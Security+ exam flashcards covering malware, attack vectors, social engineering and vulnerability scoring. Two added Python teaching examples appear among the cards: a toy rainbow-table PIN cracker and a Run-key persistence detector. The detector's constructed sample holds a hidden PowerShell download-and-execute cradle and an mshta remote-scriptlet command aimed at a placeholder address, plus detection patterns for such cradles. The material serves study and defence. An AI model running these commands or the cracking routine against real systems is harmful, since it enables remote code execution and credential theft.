CompTIA Security+ Cert Prep 1: Threats, Attacks, and Vulnerabilities


What presents itself to be legitimate software but delivers a malicious payload behind the scenes?

Trojan Horses

Most programs run in what type of less privileged mode?

User Mode

Name 2 types of code-based malware.

1. Backdoors 2. Logic Bombs

Name common attack vectors.

1. Email
2. Social Media
3. Removable Media
4. Card Skimmers
5. Cloud Services
6. Network / Wireless Network
7. Supply Chain
8. Direct Access

What are the 4 steps used to build and operate a botnet?

1. The attacker first infects a system with malware.
2. Once the attacker controls the system, it is joined with other infected systems to form a botnet.
3. Each infected system lies dormant, awaiting instructions.
4. The attacker sends instructions to the botnet through a command-and-control (C2) mechanism to carry out the malicious act.

Name 3 ways to avoid malware.

1. Install antivirus software and keep it current.
2. Apply security patches promptly.
3. Educate users about the dangers of malware.

What are ways to prevent insider attacks?

1. Perform background checks on potential employees.
2. Follow the principle of least privilege.
3. Use two-person control for very sensitive transactions.
4. Implement a mandatory vacation policy for critical staff.

What are the 3 hacker "hat" colors?

1. White Hats 2. Black Hats 3. Gray Hats

The first Internet worm was released in what year, and by whom? Known as the Morris (RTM) worm, it infected roughly 10% of the Internet at the time.

1988; Robert T. Morris

Name the most popular macro scripting language.

VBA (Visual Basic for Applications)

What spreads from system to system based on human action?

Viruses

What CVSS value is the threshold at which PCI DSS requires remediation to achieve a passing scan? A. 4 B. 5.5 C. 6 D. 8

A. 4 (any finding with a CVSS base score of 4.0 or higher fails a PCI DSS ASV scan)

Which one of the following metrics does not contribute to the exploitability score for a vulnerability in CVSS? A. Confidentiality B. User Interaction C. Attack Vector D. Attack Complexity

A. Confidentiality (an impact metric; the exploitability score is built from Attack Vector, Attack Complexity, Privileges Required, and User Interaction)

Which one of the following is not an example of an open source intelligence resource? A. IP Reputation Service B. Social Media C. Security Website D. Government Security Analysis Center

A. IP Reputation Service

What security technology best assists with the automation of security workflows? A. SOAR B. IPS C. SIEM D. CASB

A. SOAR

Randy is developing a vulnerability management program. Which one of the following is not a common source of requirements for such a program? A. Sales Team Requests B. Legal Requirements C. Security Objectives D. Corporate Policy

A. Sales Team Requests

In what type of social engineering attack does the attacker physically observe the victim's activity? A. Shoulder Surfing B. Tailgating C. Dumpster Diving D. Phishing

A. Shoulder Surfing

It is difficult to develop defenses against APT attackers. A. True B. False

A. True

It is generally a bad practice to run software after the vendor's end of life. A. True B. False

A. True

Which one of the following types of malware can spread without any user interaction? A. Worm B. Back Door C. Trojan Horse D. Virus

A. Worm

Which state-sponsored actors employ extremely advanced tools and are very difficult to detect?

APT Group (Advanced Persistent Threat Group)

What does APT (as in APT groups) stand for?

Advanced Persistent Threat

_____ is malware whose specific purpose is displaying advertisements, but instead of generating revenue for the content owner, it generates revenue for the malware author.

Adware

What two types of malware often come packaged together with software a user actually wants to download? Often the click-through installer tricks the user into granting them access, or they obtain access without permission.

Adware and Spyware

_____ are integrated into software applications and are allowed interaction with that application in a programmatic manner.

Application Scripts

Paths that attackers use to gain initial access?

Attack Vectors

As Dave works with his colleagues in other IT disciplines, he notices that they use different names to refer to the same products and vendors. Which SCAP component would best assist him in reconciling these differences? A. CVE B. CPE C. CVSS D. OVAL

B. CPE (Common Platform Enumeration)

Helen has vulnerability scanners located at several points on her network. Which one of the following scanners is likely to provide the most complete picture of the vulnerabilities present on a public web server? A. External Scanner B. DMZ Scanner C. User Subnet Scanner D. Intranet Scanner

B. DMZ Scanner

The analysis of adversary TTP includes tools, techniques, and policies. A. True B. False

B. False (TTP stands for tactics, techniques, and procedures)

Matt would like to limit the tests performed by his vulnerability scanner to only those that affect operating systems installed in his environment. Which setting should he modify? A. Ping Type B. Plug-Ins C. Safe Checks D. Sensitivity Level

B. Plug-Ins

What language is commonly used to automate the execution of system administration tasks on Windows systems? A. Bash B. PowerShell C. Python D. Ruby

B. PowerShell

In what technique do attackers pose as their victim to elicit information from third parties? A. Spoofing B. Pretexting C. Skimming D. Phishing

B. Pretexting

Dan is engaging in a password cracking attack where he uses precomputed hash values. What type of attack is Dan waging? A. Brute Force B. Rainbow Table C. Hybrid D. Dictionary

B. Rainbow Table
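To make the "precomputed hash values" in Dan's card concrete, here is an added example (my own code, not from the study set or the CompTIA course) of a miniature rainbow table: chains of hash-then-reduce steps are precomputed, only the endpoints are stored, and a captured hash is cracked by walking it forward to an endpoint and regenerating that chain. The password space (4-digit PINs), the unsalted SHA-256 hash, the position-dependent reduction function and the chain parameters are all assumptions chosen so it runs in seconds; real tables use the same mechanics over far larger spaces. The last function shows the standard defence: a per-user salt means the stored value is never in a table built over bare passwords.

```python
import hashlib

# Toy password space: 4-digit PINs (assumption for the example).
PIN_SPACE = 10_000
CHAIN_LEN = 50
NUM_CHAINS = 600


def H(pw: str) -> str:
    """Unsalted SHA-256: the kind of hash a rainbow table can be built against."""
    return hashlib.sha256(pw.encode()).hexdigest()


def reduce_(digest: str, i: int) -> str:
    """Reduction function R_i: maps a digest back into the PIN space. Making it
    depend on the chain position i is what distinguishes a rainbow table from a
    plain hash-chain table; it limits how often chains merge."""
    return f"{(int(digest, 16) + i) % PIN_SPACE:04d}"


def build_table(num_chains: int = NUM_CHAINS, chain_len: int = CHAIN_LEN) -> dict:
    """Precompute chains and keep only endpoint -> [start points]. Storing just the
    ends is why the table is far smaller than a full hash -> password lookup."""
    table = {}
    for k in range(num_chains):
        start = f"{(k * 16) % PIN_SPACE:04d}"  # deterministic, distinct start points
        p = start
        for i in range(chain_len):
            p = reduce_(H(p), i)
        table.setdefault(p, []).append(start)   # list: merged chains share an endpoint
    return table


def crack(target: str, table: dict, chain_len: int = CHAIN_LEN):
    """Return the PIN whose unsalted hash is `target`, or None if no chain covers it."""
    for i in range(chain_len - 1, -1, -1):
        # Hypothesis: target is the hash at position i of some chain.
        # Apply R_i .. R_{t-1} to reach what would then be that chain's endpoint.
        p = reduce_(target, i)
        for j in range(i + 1, chain_len):
            p = reduce_(H(p), j)
        for start in table.get(p, ()):
            # Candidate chain (may be a false alarm caused by a merge): rebuild it
            # from the start and verify against the real hash at each position.
            cand = start
            for j in range(chain_len):
                if H(cand) == target:
                    return cand
                cand = reduce_(H(cand), j)
    return None


def salted_hash(pin: str, salt: str) -> str:
    """With a per-user salt the stored value is H(salt || pin); a table built over
    bare PINs does not contain it, so the attacker must rebuild per salt."""
    return H(salt + pin)


if __name__ == "__main__":
    table = build_table()
    print("distinct endpoints stored:", len(table), "of", NUM_CHAINS, "chains")
    print("unsalted 0016 ->", crack(H("0016"), table))
    print("salted   0016 ->", crack(salted_hash("0016", "9f1c"), table))
```

Every chain start point is guaranteed to be recoverable, which the test relies on; coverage of the rest of the space depends on chain count, length and merges, which is the space/time trade-off rainbow tables exist to tune.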

Cryptolocker is an example of what type of malicious software? A. Adware B. Ransomware C. Spyware D. Trojan Horse

B. Ransomware

Which one of the following issues is not generally associated with the use of default configurations? A. Extraneous Services Running B. SQL Injection Flaws C. Open Ports D. Vendor-Assigned Passwords

B. SQL Injection Flaws

What type of website does the attacker use when waging a watering hole attack? A. Software Distribution Site B. Site Trusted by the End User C. Hacker Forum D. Known Malicious Site

B. Site Trusted by the End User

Where do fileless viruses often store themselves to maintain persistence? A. Memory B. Windows Registry C. BIOS D. Disk

B. Windows Registry

Name the scripting language used on Mac and Linux.

BASH (Bourne-Again Shell)

_____ occur when a programmer provides a means to grant themselves or others further access to a system.

Backdoors

These hackers do not have the target's permission and hack with malicious intent.

Black Hats

_____ are collections of zombie computers used for malicious purposes.

Botnets

What approach to threat identification begins with a listing of all resources owned by the organization? A. Likelihood-focused B. Threat-Focused C. Asset-Focused D. Service-Focused

C. Asset-Focused

What is the basic principle underlying threat hunting activities? A. Fail-Safe B. Default Deny C. Assumption of Compromise D. Least Privilege

C. Assumption of Compromise

Which one of the following controls is not particularly effective against the insider threat? A. Least Privilege B. Background Checks C. Firewalls D. Separation of Duties

C. Firewalls

Which of the following is a common command-and-control mechanism for botnets? A. FTP B. SMTP C. IRC D. HTTP

C. IRC (Internet Relay Chat)

What type of malware delivers its payload only after certain conditions are met, such as specific date and time occurring? A. Worm B. Ransomware C. Logic Bomb D. Trojan Horse

C. Logic Bomb

What type of artificial intelligence technique is most commonly associated with optimization? A. Proactive Analytics B. Descriptive Analytics C. Prescriptive Analytics D. Predictive Analytics

C. Prescriptive Analytics

Which of the following is a standardized language used to communicate security information between systems and organizations A. CybOX B. TAXII C. STIX D. CVSS

C. STIX

Linda's organization recently experienced a social engineering attack. The attacker called a help desk employee and persuaded her that she was a project manager on a tight deadline and locked out of her account. The help desk technician provided the attacker with access to the account. What social engineering principle was used? A. Social Proof B. Authority C. Urgency D. Scarcity

C. Urgency

What attack vector uses devices attached to ATMs, gas pumps, and other magnetic card readers to read and copy the data from the card's magnetic stripe, so that it can be cloned for use elsewhere?

Card Skimmers

Which attack vector do attackers scan regularly for improper access controls, systems with security flaws, or accidentally published API (Application Programming Interface) keys and passwords?

Cloud Services

What does the acronym CVSS stand for?

Common Vulnerability Scoring System

_____ is a form of malware that takes over the computing capacity of a user's system and uses that capacity to mine cryptocurrencies.

Cryptomalware

Data breaches violate which principle of cybersecurity? A. Integrity B. Availability C. Non-Repudiation D. Confidentiality

D. Confidentiality

The reuse of passwords across multiple sites makes an individual susceptible to _____ attacks. A. Rainbow Table B. Password Spraying C. Brute Force D. Credential Stuffing

D. Credential Stuffing

Jason recently investigated a vulnerability discovered during a scan and, after exhaustive research, determined that the vulnerability did not exist. What type of error occurred? A. False Negative B. True Negative C. True Positive D. False Positive

D. False Positive

What type of attacker is primarily concerned with advancing an ideological agenda? A. APT B. Script Kiddie C. Organized Crime D. Hacktivist

D. Hacktivist

What type of organization facilitates cybersecurity information sharing among industry-specific communities? A. CIRT B. CERT C. InfraGard D. ISAC

D. ISAC

Renee is creating a prioritized list of scanning targets. Which one of the following is the least important criterion for her prioritization? A. Network Exposure B. Information Sensitivity C. Services Installed D. Operating System

D. Operating System

What device is often used in card cloning attacks? A. Malicious USB B. Unsecured Network C. Smart Card D. Skimmer

D. Skimmer

What type of phishing attack focuses specifically on senior executives of a targeted organization? A. Pharming B. Spear Phishing C. Vishing D. Whaling

D. Whaling

What attack vector sends phishing messages and messages containing malicious attachments and links directly to the user?

Emails

What avoids detection by simple antivirus software by operating completely in a computer's memory?

Fileless Viruses

What can maintain persistence on a system by writing a copy of themselves to the Windows Registry, where they can instruct Windows to load them back into memory after a reboot?

Fileless Viruses
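The two fileless-malware cards above (and the earlier multiple-choice one on Windows Registry persistence) describe the mechanism but not how you would look for it. The following is an added example, not code from the study set or the course: it parses a `.reg` export of a Run key and flags values that launch a script host (PowerShell, mshta, wscript, rundll32, regsvr32) with the tell-tale options that in-memory loaders rely on, decoding any `-EncodedCommand` payload so the real command can be inspected. The registry export, value names, paths and the 203.0.113.0/24 address are constructed for the example and do not come from a real host; the indicator list is my own starting set, not a complete detection rule.

```python
import base64
import binascii
import re

# Constructed sample of what `reg export HKCU\...\CurrentVersion\Run` produces.
# Names, paths and the 203.0.113.0/24 address are made up for this example.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s')".encode("utf-16-le")
).decode()

SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"',
    '"Updater"="powershell.exe -w hidden -nop -ep bypass -enc ' + ENCODED + '"',
    r'"Helper"="mshta.exe javascript:a=GetObject(\"script:http://203.0.113.7/x.sct\").Exec();close()"',
    r'"Agent"="\"C:\\Program Files\\Vendor\\agent.exe\" --start"',
])

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
RUN_KEY_RE = re.compile(r"\\run(?:once)?$", re.I)
SCRIPT_HOSTS = ("powershell", "pwsh", "wscript", "cscript", "mshta", "rundll32", "regsvr32")
INDICATORS = [  # (regex, label); assumption: a starter list, not a complete rule set
    (r"-(?:enc|encodedcommand|e)\b", "encoded command"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-nop\b|-noprofile\b", "profile suppressed"),
    (r"-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"\biex\b|invoke-expression|downloadstring|frombase64string", "download/eval cradle"),
    (r"\b(?:javascript|vbscript):", "script-protocol handler"),
    (r"https?://", "remote URL"),
]


def unescape(s: str) -> str:
    """Undo .reg escaping of backslash and double quote."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_entries(reg_text: str) -> dict:
    """Return {value name: command line} for every value under a Run/RunOnce key."""
    entries, in_run_key = {}, False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_run_key = bool(RUN_KEY_RE.search(line[1:-1]))
            continue
        m = VALUE_RE.match(line) if in_run_key else None
        if not m:
            continue
        name, data = unescape(m.group(1)), m.group(2)
        if data.startswith('"') and data.endswith('"'):
            data = unescape(data[1:-1])  # REG_SZ value; other types are kept raw
        entries[name] = data
    return entries


def decode_encoded_command(cmd: str):
    """If the command carries -enc/-EncodedCommand, return the decoded UTF-16LE script."""
    m = re.search(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(entries: dict) -> dict:
    """Map each Run value to the indicators it trips (empty list = nothing seen)."""
    findings = {}
    for name, cmd in entries.items():
        reasons = []
        if any(h in cmd.lower() for h in SCRIPT_HOSTS):
            text = cmd
            decoded = decode_encoded_command(cmd)
            if decoded:
                text += " " + decoded  # scan the decoded payload as well
            for pattern, label in INDICATORS:
                if re.search(pattern, text, re.I):
                    reasons.append(label)
        findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage(parse_run_entries(SAMPLE_REG)).items():
        print(f"{name:10s} {'SUSPICIOUS' if reasons else 'ok':10s} {', '.join(reasons)}")
```

Run keys under HKCU and HKLM are only the most common location; the same triage applies to RunOnce, Winlogon, scheduled tasks and WMI event subscriptions, which is why the card says "often" rather than "always".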

These hackers do not have the target's permission but hack with the motivation of helping their victims improve their security.

Gray Hats

Attackers seeking to use their hacking skills to advance a political or social agenda are called?

Hacktivists

What is a common command-and-control mechanism for botnets?

IRC (Internet Relay Chat)

What threats are considered the most costly and dangerous attacks?

Insider Threats

What does IRC stand for?

Internet Relay Chat

Operating Systems run in what highly privileged mode?

Kernel Mode

What type of malware delivers its payload only after certain conditions are met, such as specific date and time occurring?

Logic Bomb

_____ are malware set to execute a payload once specific conditions are met.

Logic Bombs

Which attack vector do attackers exploit by getting direct access to a network jack or port in an unsecured public area?

Network

What is the term given to the malicious action that malware performs?

Payload

Name the scripting language used on Windows.

PowerShell

What language is commonly used to automate the execution of system administration tasks on Windows systems?

PowerShell

What attacks take a normal user's credentials and turn them into a superuser account?

Privilege Escalation Attacks

What is term given to the way that a malware object spreads?

Propagation Mechanism

Name the most popular general-purpose scripting language.

Python

What provides attackers with the ability to remotely access and control infected systems?

RAT (Remote Access Trojans)

Cryptolocker is an example of what type of malicious software?

Ransomware

_____ blocks a user's use of a computer or data until a set amount has been paid.

Ransomware

What attack vector uses physical devices or drives to spread malware? Attackers will leave those devices or drives in locations such as parking lots, airports, or other public areas hoping that someone will find the drive and plug it into their system.

Removable Media

Hackers will gain access to a normal user's account on a system and then use a _____ to obtain superuser access.

Rootkit

_____ are a type of malware designed for privilege escalation.

Rootkits

Attackers who hack just to see if they can break into a system are known as?

Script Kiddies

_____ are a sequence of instructions that a developer provides to a computer, telling it how to execute a series of steps.

Scripts

What does the acronym SCAP stand for?

Security Content Automation Protocol

Technology brought into the organization by individual employees without the approval of technology leaders?

Shadow IT

_____ are designed to be run at the command line and are typically integrated with the operating systems.

Shell Scripts

Which attack vector spreads malware the same way as email but over a widely used application, typically as part of an influence campaign designed to gain the trust of users, who can then be tricked into granting unauthorized access to information or systems?

Social Media

Keystroke logging, monitoring website visits to capture credentials, and searching the user's hard drive or cloud-based storage for sensitive information are the work of what form of malware?

Spyware

_____ is malware that gathers information without the user's knowledge or consent. It then reports that information back to the malware author, who can use it for any purpose.

Spyware

What was the first worm to cross the virtual/physical barrier?

Stuxnet (2010)

What is the attack vector where attackers try to interfere or obtain devices prior to them getting to the organization?

Supply Chain

These hackers work with the full permission of the target, and are motivated by finding security flaws so they can be fixed.

White Hats

Where do fileless viruses often store themselves to maintain persistence?

Windows Registry

Which attack vector does not require physical access, because attackers can reach it from a nearby parking lot or through poorly configured security?

Wireless Network

Which type of malware can spread without any user interaction

Worm

What spreads from system to system without any human interaction?

Worms

